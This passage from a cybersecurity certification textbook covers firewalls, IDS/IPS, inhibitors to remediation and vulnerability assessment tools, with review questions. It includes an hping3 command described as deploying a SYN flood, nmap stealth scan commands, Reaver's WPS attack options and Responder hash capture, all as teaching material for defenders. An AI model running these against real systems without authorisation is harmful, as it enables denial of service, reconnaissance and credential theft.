be signature or anomaly based, it can also use a rate-based
metric that analyzes the volume of traffic as well as the type of
traffic. In most cases, implementing an IPS is more costly than
implementing an IDS because of the added security needed to
contain attacks compared to the security needed to simply
detect attacks. In addition, running an IPS is more of an overall
performance load than running an IDS.
HIDS/NIDS
The most common way to classify an IDS is based on its
information source: network based or host based. The most
common IDS, the network-based IDS (NIDS), monitors
network traffic on a local network segment. To monitor traffic
on the network segment, the network interface card (NIC) must
be operating in promiscuous mode—a mode in which the NIC
process all traffic and not just the traffic directed to the host. A
NIDS can only monitor the network traffic. It cannot monitor
any internal activity that occurs within a system, such as an
attack against a system that is carried out by logging on to the
system’s local terminal. A NIDS is affected by a switched
network because generally a NIDS monitors only a single
network segment. A host-based IDS (HIDS) is an IDS that is
installed on a single host and protects only that host.
Firewall
The network device that perhaps is most connected with the
idea of security is the firewall. Firewalls can be software
programs that are installed over server operating systems, or
they can be appliances that have their own operating system. In
either case, the job of firewalls is to inspect and control the type
of traffic allowed. Firewalls can be discussed on the basis of
their type and their architecture. They can also be physical
devices or exist in a virtualized environment. The following
sections look at them from all angles.
Firewall Types
When we discuss types of firewalls, we are focusing on the
differences in the way they operate. Some firewalls make a more
thorough inspection of traffic than others. Usually there is
trade-off in the performance of the firewall and the type of
inspection it performs. A deep inspection of the contents of each
packet results in the firewall having a detrimental effect on
throughput, whereas a more cursory look at each packet has
somewhat less of an impact on performance. It is therefore
important to carefully select what traffic to inspect, keeping this
trade-off in mind.
Packet-filtering firewalls are the least detrimental to throughput
because they inspect only the header of a packet for allowed IP
addresses or port numbers. Although even performing this
function slows traffic, it involves only looking at the beginning
of the packet and making a quick allow or disallow decision.
Although packet-filtering firewalls serve an important function,
they cannot prevent many attack types. They cannot prevent IP
spoofing, attacks that are specific to an application, attacks that
depend on packet fragmentation, or attacks that take advantage
of the TCP handshake. More advanced inspection firewall types
are required to stop these attacks.
Stateful firewalls are aware of the proper functioning of the TCP
handshake, keep track of the state of all connections with
respect to this process, and can recognize when packets that are
trying to enter the network don’t make sense in the context of
the TCP handshake. For example, a packet should never arrive
at a firewall for delivery and have both the SYN flag and the
ACK flag set unless it is part of an existing handshake process,
and it should be in response to a packet sent from inside the
network with the SYN flag set. This is the type of packet that the
stateful firewall would disallow. A stateful firewall also has the
ability to recognize other attack types that attempt to misuse
this process. It does this by maintaining a state table about all
current connections and the status of each connection process.
This allows it to recognize any traffic that doesn’t make sense
with the current state of the connection. Of course, maintaining
this table and referencing it cause this firewall type to have
more effect on performance than does a packet-filtering
firewall.
Proxy firewalls actually stand between each connection from the
outside to the inside and make the connection on behalf of the
endpoints. Therefore, there is no direct connection. The proxy
firewall acts as a relay between the two endpoints. Proxy
firewalls can operate at two different layers of the OSI model.
Circuit-level proxies operate at the session layer (Layer 5) of the
OSI model. They make decisions based on the protocol header
and session layer information. Because they do not do deep
packet inspection (at Layer 7, the application layer), they are
considered application independent and can be used for wide
ranges of Layer 7 protocol types. A SOCKS firewall is an
example of a circuit-level proxy firewall. It requires a SOCKS
client on the computers. Many vendors have integrated their
software with SOCKS to make using this type of firewall easier.
Application-level proxies perform deep packet inspection. This
type of firewall understands the details of the communication
process at Layer 7 for the application of interest. An applicationlevel firewall maintains a different proxy function for each
protocol. For example, for HTTP, the proxy can read and filter
traffic based on specific HTTP commands. Operating at this
layer requires each packet to be completely opened and closed,
so this type of firewall has the greatest impact on performance.
Dynamic packet filtering does not describe a type of firewall;
rather, it describes functionality that a firewall might or might
not possess. When an internal computer attempts to establish a
session with a remote computer, it places both a source and
destination port number in the packet. For example, if the
computer is making a request of a web server, because HTTP
uses port 80, the destination is port 80. The source computer
selects the source port at random from the numbers available
above the well-known port numbers (that is, above 1023).
Because predicting what that random number will be is
impossible, creating a firewall rule that anticipates and allows
traffic back through the firewall on that random port is
impossible.
A dynamic packet-filtering firewall keeps track of that source
port and dynamically adds a rule to the list to allow return
traffic to that port.
A kernel proxy firewall is an example of a fifth-generation
firewall. It inspects a packet at every layer of the OSI model but
does not introduce the same performance hit as an applicationlevel firewall because it does this at the kernel layer. It also
follows the proxy model in that it stands between the two
systems and creates connections on their behalf.
Firewall Architecture
Whereas the type of firewall speaks to the internal operation of
the firewall, the architecture refers to the way in which the
firewall or firewalls are deployed in the network to form a
system of protection. This section looks at the various ways
firewalls can be deployed and the names of these various
configurations.
A bastion host might or might not be a firewall. The term
actually refers to the position of any device. If it is exposed
directly to the Internet or to any untrusted network, it is called a
bastion host. Whether it is a firewall, a DNS server, or a web
server, all standard hardening procedures become even more
important for these exposed devices. Any unnecessary services
should be stopped, all unneeded ports should be closed, and all
security patches must be up to date. These procedures are
referred to as “reducing the attack surface.”
A dual-homed firewall is a firewall that has two network
interfaces: one pointing to the internal network and another
connected to the untrusted network. In many cases, routing
between these interfaces is turned off. The firewall software
allows or denies traffic between the two interfaces, based on the
firewall rules configured by the administrator. The danger of
relying on a single dual-homed firewall is that it provides a
single point of failure. If this device is compromised, the
network is compromised also. If it suffers a denial-of-service
(DoS) attack, no traffic can pass. Neither of these is a good
situation. In some cases, a firewall may be multihomed.
One popular type is the three-legged firewall. This configuration
has three interfaces: one connected to the untrusted network,
one to the internal network, and the last one to a part of the
network called a demilitarized zone (DMZ). A DMZ is a portion
of the network where systems will be accessed regularly from an
untrusted network. These might be web servers or an e-mail
server, for example. The firewall can be configured to control
the traffic that flows between the three networks, but it is
important to be somewhat careful with traffic destined for the
DMZ and to treat traffic to the internal network with much
more suspicion.
Although the firewalls discussed thus far typically connect
directly to an untrusted network (at least one interface does), a
screened host is a firewall that is between the final router and
the internal network. When traffic comes into the router and is
forwarded to the firewall, it is inspected before going into the
internal network.
A screened subnet takes this concept a step further. In this case,
two firewalls are used, and traffic must be inspected at both
firewalls to enter the internal network. It is called a screen
subnet because there is a subnet between the two firewalls that
can act as a DMZ for resources from the outside world. In the
real world, these various firewall approaches are mixed and
matched to meet requirements, so you might find elements of
all these architectural concepts applied to a specific situation.
INHIBITORS TO REMEDIATION
In some cases, there may be issues that make implementing a
particular solution inadvisable or impossible. Some of these
inhibitors to remediation are as follows:
Memorandum of understanding (MOU): An MOU is a
document that, while not legally binding, indicates a general
agreement between the principals to do something together. An
organization may have MOUs with multiple organizations, and
MOUs may in some instances contain security requirements that
inhibit or prevent the deployment of certain measures.
Service-level agreement (SLA): An SLA is a document that
specifies a service to be provided by a party, the costs of the service,
and the expectations of performance. These contracts may exist
with third parties from outside the organization and between
departments within an organization. Sometimes these SLAs may
include specifications that inhibit or prevent the deployment of
certain measures.
Organizational governance: Organizational governance refers
to the process of controlling an organization’s activities, processes,
and operations. When the process is unwieldy, as it is in some very
large organizations, the application of countermeasures may be
frustratingly slow. One of the reasons for including upper
management in the entire process is to use the weight of authority
to cut through the red tape.
Business process interruption: The deployment of mitigations
cannot be done in such a way that business operations and
processes are interrupted. Therefore, the need to conduct these
activities during off-hours can also be a factor that impedes the
remediation of vulnerabilities.
Degrading functionality: Some solutions create more issues
than they resolve. In some cases, it may impossible to implement
mitigation because it would break mission-critical applications or
processes. The organization may need to research an alternative
solution.
Legacy systems: Legacy systems are those that are older and
may be less secure than newer systems. Some of these older system
are no longer supported and are not receiving updates. In many
cases, organizations have legacy systems performing critical
operations and the enterprise cannot upgrade those systems for one
reason or another. It could be that the current system cannot be
upgraded because it would be disruptive to sales or marketing.
Sometimes politics prevents these upgrades. In some cases the
money is just not there for the upgrade. For whatever reason, the
inability to upgrade is an inhibitor to remediation.
Proprietary systems: In some cases, solutions have been
developed by the organization that do not follow standards and are
proprietary in nature. In this case the organization is responsible
for updating the systems to address security issues. Many times this
does not occur. For these types of systems, the upgrade path is even
more difficult because performing the upgrade is not simply a
matter of paying for the upgrade and applying the upgrade. The
work must be done by the programmers in the organization that
developed the solution (if they are still around). Obviously the
inability to upgrade is an inhibitor to remediation.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep practice
test software.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 3-4
lists a reference of these key topics and the page numbers on
which each is found.
Table 3-4 Key Topics in Chapter 3
Key Topic Element
Bulleted
Description
Page Number
Goals of the vulnerability assessment
4
list
1
Bulleted
list
Assigning a level of criticality to a particular
data set
4
3
Bulleted
list
Active vs. passive scanning
4
3
Bulleted
list
Scanner result types
4
4
Step list
Patch management life cycle
4
6
Bulleted
list
System hardening examples
4
6
Bulleted
list
Methods used to handle risk
4
7
Bulleted
list
Threat mitigation validation steps
4
8
Bulleted
list
Scanning risks
4
9
Bulleted
list
Benefits of credentialed scans
5
1
Table 3-2
Server-Based vs. Agent-Based Scanning
5
2
Bulleted
list
Security legislation
5
5
Table 3-3
High-Level Overview of PCI DSS
5
6
Bulleted
list
Categories of IDSs
5
7
DEFINE KEY TERMS
asset criticality
passive vulnerability scanning
active vulnerability scanning
enumeration
true positive
false positive
true negative
false negative
configuration baseline
patching
hardening
compensating controls
risk acceptance
vulnerability feed
scope
credentialed scan
non-credentialed scan
external scan
internal scan
memorandum of understanding (MOU)
service-level agreement (SLA)
legacy systems
proprietary systems
REVIEW QUESTIONS
1. ____________________ describes the relative value of
an asset to the organization.
2. List at least one question that should be raised to determine
asset criticality.
3. Nessus Network Monitor is an example of a(n)
_____________ scanner.
4. Match the following terms with their definition.
Terms
Definitions
False
positive
Occurs when the scanner does not identify a
vulnerability that exists.
True
positive
Occurs when the scanner correctly determines that a
vulnerability does not exist.
False
negativ
e
Occurs when the scanner correctly identifies a
vulnerability.
True
negativ
e
Occurs when the scanner identifies a vulnerability
that does not exist.
5. ____________________ are security settings that are
required on devices of various types.
6. Place the following patch management life cycle steps in
order.
Install the patches in the live environment.
Determine the priority of the patches and schedule the patches for
deployment.
Ensure that the patches work properly.
Test the patches.
7. When you are encrypting sensitive data, you are
implementing a(n) _________________.
8. List at least two logical hardening techniques.
9. Match the following risk-handling techniques with their
definitions.
Method
Definition
Risk
transfe
r
Understanding and accepting the level of risk as well as
the cost of damages that can occur
Risk
mitigat
ion
Terminating the activity that causes a risk or choosing
an alternative that is not as risky
Risk
avoida
nce
Passing on the risk to a third party, such as an
insurance company
Risk
accept
ance
Defining the acceptable risk level the organization can
tolerate and reducing the risk to that level
10. List at least one risk to scanning.
Chapter 4
Analyzing Assessment
Output
This chapter covers the following topics related to Objective 1.4
(Given a scenario, analyze the output from common vulnerability
assessment tools) of the CompTIA Cybersecurity Analyst (CySA+)
CS0-002 certification exam:
Web application scanner: Covers the OWASP Zed Attack Proxy
(ZAP), Burp Suite, Nikto, and Arachni scanners.
Infrastructure vulnerability scanner: Covers the Nessus,
OpenVAS, and Qualys scanners.
Software assessment tools and techniques: Explains static
analysis, dynamic analysis, reverse engineering, and fuzzing.
Enumeration: Describes Nmap, hping, active vs. passive
enumeration, and Responder.
Wireless assessment tools: Covers Aircrack-ng, Reaver, and
oclHashcat.
Cloud infrastructure assessment tools: Covers ScoutSuite,
Prowler, and Pacu.
When assessments are performed there will be data that is
gathered that must be analyzed. The format of the output
generated by the various tools used to perform the vulnerability
assessment may be intuitive, but in many cases it is not.
Analysts must be able to read and correctly interpret the output
to identify issues that may exist. This chapter is dedicated to
analyzing vulnerability assessment output.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
than one of these six self-assessment questions, you might want
to skip ahead to the “Exam Preparation Tasks” section. Table 41 lists the major headings in this chapter and the “Do I Know
This Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these specific
areas. The answers to the “Do I Know This Already?” quiz
appear in Appendix A.
Table 4-1 “Do I Know This Already?” Foundation Topics
Section-to-Question Mapping
Foundation Topics Section
Question
Web Application Scanner
1
Infrastructure Vulnerability Scanner
2
Software Assessment Tools and Techniques
3
Enumeration
4
Wireless Assessment Tools
5
Cloud Infrastructure Assessment Tools
6
1. Which of the following is a type of proactive monitoring and
uses external agents to run scripted transactions against an
application?
1. RUM
2. Synthetic transaction monitoring
3. Reverse engineering
4. OWASP
2. Which of the following is an example of a cloud-based
vulnerability scanner?
1. OpenVAS
2. Qualys
3. Nikto
4. NESSUS
3. Which step in the software development life cycle (SDLC)
follows the design step?
1. Gather requirements
2. Certify/accredit
3. Develop
4. Test/validate
4. Which of the following is the process of discovering and
listing information?
1. Escalation
2. Discovery
3. Enumeration
4. Penetration
5. Which of the following is a set of command-line tools you
can use to sniff WLAN traffic?
1. hping3
2. Aircrack-ng
3. Qualys
4. Reaver
6. Which of the following is a data collection tool that allows
you to use longitudinal survey panels to track and monitor
the cloud environment?
1. Prowler
2. ScoutSuite
3. Pacu
4. Mikto
FOUNDATION TOPICS
WEB APPLICATION SCANNER
Web vulnerability scanners focus on discovering
vulnerabilities in web applications. These tools can operate in
two ways: synthetic transaction monitoring or real user
monitoring. In synthetic transaction monitoring, preformed
(synthetic) transactions are performed against the web
application in an automated fashion, and the behavior of the
application is recorded. In real user monitoring, real user
transactions are monitored while the web application is live.
Synthetic transaction monitoring, which is a type of
proactive monitoring, uses external agents to run scripted
transactions against a web application. This type of monitoring
is often preferred for websites and applications. It provides
insight into the application’s availability and performance and
warns of any potential issue before users experience any
degradation in application behavior. For example, Microsoft’s
System Center Operations Manager (SCOM) uses synthetic
transactions to monitor databases, websites, and TCP port
usage.
In contrast, real user monitoring (RUM), which is a type of
passive monitoring, captures and analyzes every transaction of
every web application or website user. Unlike synthetic
transaction monitoring, which attempts to gain performance
insights by regularly testing synthetic interactions, RUM cuts
through the guesswork, seeing exactly how users are interacting
with the application.
Many web application scanners are available. These tools scan
an application for common security issues with cookie
management, PHP scripts, SQL injections, and other problems.
Some examples of these tools are covered in this section.
Burp Suite
The Burp Suite is a suite of tools, one of which can be used for
testing web applications. It can scan an application for
vulnerabilities and can also be used to crawl an application (to
discover content). This commercial software is available for
Windows, Linux, and macOS. It can also be used for exploiting
vulnerabilities. For more information, see
https://portswigger.net/burp.
OWASP Zed Attack Proxy (ZAP)
The Open Web Application Security Project (OWASP) produces
an interception proxy called OWASP Zed Attack Proxy
(ZAP). It performs many of the same functions as Burp, and so
it also falls into the exploit category. It can monitor the traffic
between a client and a server, crawl the application for content,
and perform vulnerability scans. For more information, see
https://owasp.org/www-project-zap/.
Nikto
Nikto is a vulnerability scanner that is dedicated to web
servers. It is designed for Linux but can be run in Windows
through a Perl interpreter. This tool is not stealthy, but it is a
fast scanner. Everything it does is recorded in your logs. It
generates a lot of information, much of it normal or
informational. It is a command-line tool that is often run from
within a Kali Linux server and preinstalled with more than 300
penetration-testing programs. For more information, see
https://tools.kali.org/information-gathering/nikto.
Arachni
Arachni is a Ruby framework for assessing the security of a
web application. It is often used by penetration testers. It is
open source, works with all major operating systems (Windows,
macOS, and Linux), and is distributed via portable packages
that allow for instant deployment. Arachni can be used either at
the command line or via the web interface, shown in Figure 4-1.
Figure 4-1 Arachni
INFRASTRUCTURE VULNERABILITY
SCANNER
An infrastructure vulnerability scanner probes for a variety of
security weaknesses, including misconfigurations, out-of-date
software, missing patches, and open ports. These solutions can
be on premises or cloud based.
Infrastructure vulnerability scanners were covered in detail in
Chapter 18.
Nessus
One of the most widely used vulnerability scanners is Nessus
Professional, a proprietary tool developed by Tenable
Network Security. It is free of charge for personal use in a nonenterprise environment. By default, Nessus Professional starts
by listing at the top of the output the issues found on a host that
are rated with the highest severity, as shown in Figure 4-2.
Figure 4-2 Example Nessus Output
For the computer scanned in Figure 4-2, you can see that there
is one high-severity issue (the default password for a Firebird
database located on the host), and there are five medium-level
issues, including two SSL certificates that cannot be trusted and
a remote desktop man-in-the-middle attack vulnerability. For
more information, see
https://www.tenable.com/products/nessus.
OpenVAS
As you might suspect from the name, the OpenVAS tool is
open source. It was developed from the Nessus code base and is
available as a package for many Linux distributions. The
scanner is accompanied with a regularly updated feed of
network vulnerability tests (NVT). It uses the Greenbone
console, shown in Figure 4-3. For more information, see
https://www.openvas.org/.
FIGURE 4-3 OpenVAS
SOFTWARE ASSESSMENT TOOLS AND
TECHNIQUES
Many organizations create software either for customers or for
their own internal use. When software is developed, the earlier
in the process security is considered, the less it will cost to
secure the software. It is best for software to be secure by
design. Secure coding standards are practices that, if followed
throughout the software development life cycle (SDLC),
help to reduce the attack surface of an application.
In Chapter 9, “Software Assurance Best Practices,” you will
learn about the SDLC, a set of ordered steps to help ensure that
software is developed to enhance both security and
functionality. As a quick preview, the SDLC steps are listed
here:
Step 1. Plan/initiate project
Step 2. Gather requirements
Step 3. Design
Step 4. Develop
Step 5. Test/validate
Step 6. Release/maintain
Step 7. Certify/accredit
Step 8. Perform change management and configuration
management/replacement
This section concentrates on Steps 5 and 7, which is where
testing of the software occurs. This testing is covered in this
chapter because it is a part of vulnerability management. This
testing or validation can take many forms.
Static Analysis
Static code analysis is performed without the code
executing. Code review and testing must occur throughout the
entire SDLC. Code review and testing must identify bad
programming patterns, security misconfigurations, functional
bugs, and logic flaws.
Code review and testing in the planning and design phases
include architecture security reviews and threat modeling. Code
review and testing in the development phase include static
source code analysis and manual code review and static binary
code analysis and manual binary review. Once an application is
deployed, code review and testing involve penetration testing,
vulnerability scanning, and fuzz testing.
Static code review can be done with scanning tools that look for
common issues. These tools can use a variety of approaches to
find bugs, including the following:
Data flow analysis: This analysis looks at runtime information
while the software is in a static state.
Control flow graph: A graph of the components and their
relationships can be developed and used for testing by focusing on
the entry and exit points of each component or module.
Taint analysis: This analysis attempts to identify variables that
are tainted with user-controllable input.
Lexical analysis: This analysis converts source code into tokens
of information to abstract the code and make it easier to manipulate
for testing purposes.
Code review is the systematic investigation of the code for
security and functional problems. It can take many forms, from
simple peer review to formal code review. There are two main
types of reviews:
Formal review: This is an extremely thorough, line-by-line
inspection, usually performed by multiple participants using
multiple phases. This is the most time-consuming type of code
review but the most effective at finding defects.
Lightweight: This type of code review is much more cursory than
a formal review. It is usually done as a normal part of the
development process. It can happen in several forms:
Pair programming: Two coders work side by side, checking
one another’s work as they go.
Email: Code is emailed around to colleagues for them to review
when time permits.
Over the shoulder: Coworkers review the code while the
author explains his or her reasoning.
Tool-assisted: Perhaps the most efficient method, this method
uses automated testing tools.
While code review is most typically performed on in-house
applications, it may be warranted in other scenarios as well. For
example, say that you are contracting with a third party to
develop a web application to process credit cards. Considering
the sensitive nature of the application, it would not be unusual
for you to request your own code review to assess the security of
the product.
In many cases, more than one tool should be used in testing an
application. For example, an online banking application that
has had its source code updated should undergo both
penetration testing with accounts of varying privilege levels and
a code review of the critical models to ensure that defects there
do not exist.
Dynamic Analysis
Dynamic analysis is testing performed while the software is
running. This testing can be performed manually or by using
automated testing tools. There are two general approaches to
dynamic testing:
Synthetic transaction monitoring: A type of proactive
monitoring, often preferred for websites and applications. It
provides insight into the application’s availability and performance,
warning of any potential issue before users experience any
degradation in application behavior. It uses external agents to run
scripted transactions against an application. For example,
Microsoft’s System Center Operations Manager (SCOM) uses
synthetic transactions to monitor databases, websites, and TCP port
usage.
Real user monitoring (RUM): A type of passive monitoring that
captures and analyzes every transaction of every application or
website user. Unlike synthetic monitoring, which attempts to gain
performance insights by regularly testing synthetic interactions,
RUM cuts through the guesswork by analyzing exactly how your
users are interacting with the application.
Reverse Engineering
In 1990, the Institute of Electrical and Electronics Engineers
(IEEE) defined reverse engineering as “the process of
analyzing a subject system to identify the system’s components
and their interrelationships, and to create representations of the
system in another form or at a higher level of abstraction,”
where the “subject system” is the end product of software
development.
Reverse engineering techniques can be applied in several areas,
including the study of the security of in-house software. In
Chapter 16, “Applying the Appropriate Incident Response
Procedure,” you’ll learn how reverse engineering is applied to
the incident response procedure. In Chapter 12, “Implementing
Configuration Changes to Existing Controls to Improve
Security,” you’ll learn how reverse engineering applies to the
malware analysis process. The techniques you will learn about
in those chapters can also be used to locate security issues with
in-house software.
Fuzzing
Fuzz testing, or fuzzing, involves injecting invalid or
unexpected input (sometimes called faults) into an application
to test how the application reacts. It is usually done with a
software tool that automates the process. Inputs can include
environment variables, keyboard and mouse events, and
sequences of API calls. Figure 4-4 shows the logic of the fuzzing
process.
Figure 4-4 Fuzz Testing
Two types of fuzzing can be used to identify susceptibility to a
fault injection attack:
Mutation fuzzing: Involves changing the existing input values
(blindly)
Generation-based fuzzing: Involves generating the inputs from
scratch, based on the specification/format
The following measures can help prevent fault injection attacks:
Implement fuzz testing to help identify problems.
Adhere to safe coding and project management practices.
Deploy application-level firewalls.
ENUMERATION
Enumeration is the process of discovering and listing
information. Network enumeration is the process of discovering
pieces of information that might be helpful in a network attack
or compromise. There are several techniques used to perform
enumeration and several tools that make the process easier for
both testers and attackers. Let’s take a look at these techniques
and tools.
Nmap
While network scanning can be done with more blunt tools, like
ping, Nmap is stealthier and may be able to perform its
activities without setting off firewalls and IDSs. It is valuable to
note that while we are discussing Nmap in the context of
network scanning, this tool can be used for many other
operations, including performing certain attacks. When used for
scanning, it typically locates the devices, locates the open ports
on the devices, and determines the OS on each host.
After performing Nmap scans with certain flags set in the scan
packets, security analysts (and hackers) can make certain
assumptions based on the responses received. These flags are
used to control the TCP connection process and so are present
only in those packets. Figure 4-5 show a TCP header with the
important flags circled. Normally flags are “turned on” as a
result of the normal TCP process, but a hacker can craft packets
to check the flags he wants to check.
Figure 4-5 TCP Header
Figure 4-5 shows these flags, among others:
URG: Urgent pointer field significant
ACK: Acknowledgment field significant
PSH: Push function
RST: Reset the connection
SYN: Synchronize sequence numbers
FIN: No more data from sender
After performing Nmap scans with certain flags set in the scan
packets, security analysts (and hackers) can make certain
assumptions based on the responses received.
Nmap exploits weaknesses with three scan types:
Null scan: A Null scan is a series of TCP packets that contain a
sequence number of 0 and no set flags. Because the Null scan does
not contain any set flags, it can sometimes penetrate firewalls and
edge routers that filter incoming packets with particular flags.
When such a packet is sent, two responses are possible:
No response: The port is open on the target.
RST: The port is closed on the target.
Figure 4-6 shows the result of a Null scan using the command
nmap -sN. In this case, nmap received no response but was
unable to determine whether that was because a firewall was
blocking the port or the port was closed on the target.
Therefore, it is listed as open|filtered.
Figure 4-6 Null Scan
FIN scan: This type of scan sets the FIN bit. When this packet is
sent, two responses are possible:
No response: The port is open on the target.
RST/ACK: The port is closed on the target.
Example 4-1 shows sample output of a FIN scan using the
command nmap -sF, with the -v included for verbose output.
Again, nmap received no response but was unable to determine
whether that was because a firewall was blocking the port or the
port was closed on the target. Therefore, it is listed as
open|filtered.
Example 4-1 FIN Scan Using nmap –sF
Click here to view code image
# nmap -sF -v 192.168.0.7
Starting nmap 3.81 at 2016-01-23 21:17 EDT
Initiating FIN Scan against 192.168.0.7 [1663 ports] at
21:17
The FIN Scan took 1.51s to scan 1663 total ports.
Host 192.168.0.7 appears to be up ... good.
Interesting ports on 192.168.0.7:
(The 1654 ports scanned but not shown below are in
state: closed)
PORT
STATE
SERVICE
21/tcp
open|filtered ftp
22/tcp
open|filtered ssh
23/tcp
open|filtered telnet
79/tcp
open|filtered finger
110/tcp open|filtered pop3
111/tcp open|filtered rpcbind
514/tcp open|filtered shell
886/tcp open|filtered unknown
2049/tcp open|filtered nfs
MAC Address: 00:03:47:6D:28:D7 (Intel)
Nmap finished: 1 IP address (1 host up) scanned in
2.276 seconds
Raw packets sent: 1674 (66.9KB) | Rcvd:
1655 (76.1KB)
XMAS scan: This type of scan sets the FIN, PSH, and URG flags.
When this packet is sent, two responses are possible:
No response: The port is open on the target.
RST: The port is closed on the target.
Figure 4-7 shows the result of this scan, using the command
nmap -sX. In this case nmap received no response but was
unable to determine whether that was because a firewall was
blocking the port or the port was closed on the target.
Therefore, it is listed as open|filtered.
Figure 4-7 XMAS Scan
Null, FIN, and XMAS scans all serve the same purpose, to
discover open ports and ports blocked by a firewall, and differ
only in the switch used. While there are many more scan types
and attacks that can be launched with Nmap, these scan types
are commonly used during environmental reconnaissance
testing to discover what the hacker might discover and take
steps to close any gaps in security before the hacker gets there.
For more information on Nmap, see https://nmap.org/.
Host Scanning
Host scanning involves identifying the live hosts on a
network or in a domain namespace. Nmap and other scanning
tools (such as ScanLine and SuperScan) can be used for this.
Sometimes called a ping scan, a host scan records responses to
pings sent to every address in the network. You can also
combine a host scan with a port scan by using the proper
arguments to the command. During environmental
reconnaissance testing, you can make use of these scanners to
identify all live hosts. You may discover hosts that shouldn’t be
there. To execute this scan from nmap, the command is nmap
-sP 192.168.0.0-100, where 0-100 is the range of IP
addresses to be scanned in the 192.168.0.0 network. Figure 4-8
shows an example of the output from this command. This
command’s output lists all devices that are on. For each one, the
MAC address is also listed.
FIGURE 4-8 Host Scan with Nmap
hping
hping (and the newer version, hping3) is a command-lineoriented TCP/IP packet assembler/analyzer that goes beyond
simple ICMP echo requests. It supports TCP, UDP, ICMP, and
RAW-IP protocols and also has a traceroute mode. The
following is a subset of the operations possible with hping:
Firewall testing
Advanced port scanning
Network testing, using different protocols, TOS, fragmentation
Manual path MTU discovery
Advanced traceroute, under all the supported protocols
Remote OS fingerprinting
Remote uptime guessing
TCP/IP stacks auditing
What is significant about hping is that it can be used to create or
assemble packets. Attackers use packet assembly tools to create
packets that allow them to mount attacks. Testers can also use
hping to create malicious packets to assess the response of the
network defenses or to identify vulnerabilities that may exist.
A common attack is a DoS attack using what is called a SYN
flood. In this attack, the target is overwhelmed with
unanswered SYN/ACK packets. The device answers each SYN
packet with a SYN-ACK. Since devices reserve memory for the
expected response to the SYN-ACK packet, and since the
attacker never answers, the target system eventually runs out of
memory, making it essentially a dead device. This scenario is
shown in Figure 4-9.
FIGURE 4-9 SYN Flood
Example 4-2 demonstrates how to deploy a SYN flood by
executing the hping command at the terminal.
Example 4-2 Deploying a SYN Flood with hping
Click here to view code image
$ sudo hping3 -i u1 -S -p 80 -c 10 192.168.1.1
HPING 192.168.1.1 (eth0 192.168.1.1): S set, 40 headers
+ 0 data bytes
--- 192.168.1.1 hping statistic --10 packets transmitted, 0 packets received, 100% packet
loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
The command in Example 4-2 would send TCP SYN packets to
192.168.1.1. Including sudo is necessary because hping3
creates raw packets for the task. For raw sockets/packets, root
privilege is necessary on Linux. The parts of the command and
the meaning of each are described as follows:
i u1 means wait for 1 microsecond between each packet
S indicates SYN flag
p 80 means target port 80
c 10 means send 10 packets
Were this a true attack, you would expect to see many more
packets sent; however, you can see how this tool can be used to
assess the likelihood that such an attack would succeed. For
more information, see https://tools.kali.org/informationgathering/hping3.
Active vs. Passive
Chapter 3, “Vulnerability Management Activities,” covered
active and passive scanning. The concept of active and passive
enumeration is similar. Active enumeration is when you
send packets of some sort to the network and then assess
responses. An example of this would be using nmap to send
crafted packets that interrogate the accessibility of various ports
(port scan). Passive enumeration does not send packets of
any type but captures traffic and makes educated assumptions
from the traffic. An example is using a packet capture utility
(sniffer) to look for malicious traffic on the network.
Responder
Link-Local Multicast Name Resolution (LLMNR) and NetBIOS
Name Service (NBT-NS) are Microsoft Windows components
that serve as alternate methods of host identification.
Responder is a tool that can be used for a number of things,
among them answering NBT and LLMNR name requests. Doing
this poisons the service so that the victims communicate with
the adversary-controlled system. Once the name system is
compromised, Responder captures hashes and credentials that
are sent to the system after the name services have been
poisoned.
Figure 4-10 shows that after the target was convinced to talk to
Responder, it was able to capture the hash sent for
authentication, which could then be used to attempt to crack the
password.
Figure 4-10 Capturing Authentication Hashes with
Responder
WIRELESS ASSESSMENT TOOLS
To assess wireless networks for vulnerabilities, you need tools
that can use wireless antennas and sensors to capture and
examine the wireless traffic. As a security professional tasked
with identifying wireless vulnerabilities, you must also be
familiar with the tools used to compromise wireless networks.
Let’s discuss some of these tools.
Aircrack-ng
Aircrack-ng is a set of command-line tools you can use to
sniff wireless networks, among other things. Installers for this
tool are available for both Linux and Windows. It is important
to ensure that your device’s wireless chipset and driver support
this tool.
Aircrack-ng focuses on these areas of Wi-Fi security:
Monitoring: Packet capture and export of data to text files for
further processing by third-party tools
Attacking: Replay attacks, deauthentication, fake access points,
and others via packet injection
Testing: Checking Wi-Fi cards and driver capabilities (capture and
injection)
Cracking: WEP and WPA PSK (WPA1 and 2)
As you can see, capturing wireless traffic is a small part of what
this tool can do. The command for capturing is airodump-ng.
Figure 4-11 shows Aircrack-ng being used to attempt to crack an
encryption key. It attempted 1514 keys before locating the
correct one. For more information on Aircrack-ng, see
https://www.aircrack-ng.org/.
Figure 4-11 Aircrack-ng
Reaver
Reaver is both a package of tools and a command-line tool
within the package called reaver that is used to attack Wi-Fi
Protected Setup (WPS). Example 4-3 shows the reaver
command and its arguments.
Example 4-3 Reaver: Wi-Fi Protected Setup Attack Tool
Click here to view code image
root@kali:~# reaver -h
Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig
Heffner
<cheffner@tacnetsol.com
Required Arguments:
-i, --interface=<wlan>
Name of the monitormode interface
to use
-b, --bssid=<mac>
BSSID of the target AP
Optional Arguments:
-m, --mac=<mac>
MAC of the host system
-e, --essid=<ssid>
ESSID of the target
AP
-c, --channel=<channel>
Set the 802.11
channel for the
interface (implies -f)
-s, --session=<file>
session file
-C, --exec=<command>
command upon
successful pin recovery
-f, --fixed
hopping
-5, --5ghz
channels
-v, --verbose
warnings
-q, --quiet
messages
-h, --help
Advanced Options:
-p, --pin=<wps pin>
(may be
Restore a previous
Execute the supplied
Disable channel
Use 5GHz 802.11
Display non-critical
(-vv or -vvv for more)
Only display critical
Show help
Use the specified pin
arbitrary string or 4/8 digit
-d, --delay=<seconds>
WPS pin)
Set the delay between
pin
attempts [1]
-l, --lock-delay=<seconds>
if the AP
Set the time to wait
locks
WPS pin attempts [60]
-g, --max-attempts=<num>
attempts
-x, --fail-wait=<seconds>
after 10
unexpected failures [0]
